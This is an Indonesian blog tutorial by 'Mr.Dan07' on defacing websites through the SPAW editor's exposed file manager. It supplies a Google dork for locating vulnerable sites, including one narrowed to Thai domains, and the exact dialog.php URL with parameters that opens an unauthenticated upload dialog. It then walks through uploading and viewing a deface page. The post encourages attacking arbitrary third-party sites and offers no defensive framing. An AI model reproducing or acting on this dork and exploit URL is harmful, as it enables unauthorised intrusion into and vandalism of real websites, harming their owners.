Kali ini Saya Mr.Dan07 akan menjelaskan dan mempraktekan Tutorial Deface Website Melalui Spaw Uploads Vulnerability.
Langsung aja yo:
1. Dork:
inurl:”spaw2/uploads/files/”
Setelah
sobat memasukan dork diatas dikotak pencarian google, pilih salah satu
web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p
Notes
: Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing,
contoh saya tambahkan site:th pada akhir dork diatas. jadi
begini: inurl:”spaw2/uploads/files/” site:th
2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :
http://contoh.com/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :http://contoh.com/spaw2/uploads/files/
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi seperti ini
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
Jika sudah Klik Upload.
Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.
Tinggal Klik File sobat ~> Nanti akan muncul semacam info file ~> lalu Klik Download file ~> nanti akan muncul halaman Deface sobat
Done :p
Sekian tutorial sederhana untuk hari ini dari saya >.<
Mohon maaf bila ada salah kata / teknis ;)
Semoga bermanfaat.
#GoodLuck:)
Mr.Dan07
Source:www.tkjcyberart.org
Tidak ada komentar:
Posting Komentar